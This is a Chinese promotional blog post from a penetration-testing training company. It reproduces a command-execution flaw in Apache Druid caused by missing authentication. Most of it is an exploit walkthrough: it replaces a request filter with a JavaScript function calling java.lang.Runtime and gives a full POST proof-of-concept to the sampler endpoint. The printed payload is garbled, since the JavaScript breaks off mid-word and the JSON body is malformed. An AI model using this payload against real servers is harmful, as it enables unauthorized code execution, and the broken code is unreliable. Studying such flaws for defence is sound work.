Apache Druid CVE命令执行漏洞复现！

雨笋教育小编又来分享渗透技术文干货了，这次来复盘一次Apache Druid CVE漏洞。

 

Apache Druid 是用Java编写的面向列的开源分布式数据存储，旨在快速获取大量事件数据，并在数据之上提供低延迟查询。

Apache Druid 默认情况下缺乏授权认证，攻击者可以发送特制请求，利用Druid服务器上进程的特权执行任意代码。

 

自行搭建测试环境

 

复现流程

此处路径与文件填下面的值quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

 

抓包filter 参数{"type":"selector","dimension":"","value":""}}}

改成{"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRunti

成功执行命令

最终 poc 为POST http://xx.xx.xx.xx/druid/indexer/v1/sampler HTTP/1.1

Host: xx.xx.xx.xx

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/json

Content-Length: 1103

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource":}

渗透技术干货持续分享关注雨笋教育公众号！

渗透测试技术交流群：718860842

*本文章仅供技术交流分享，请勿做未授权违法攻击，雨笋教育不负任何责任。具体请参考《网络安全法》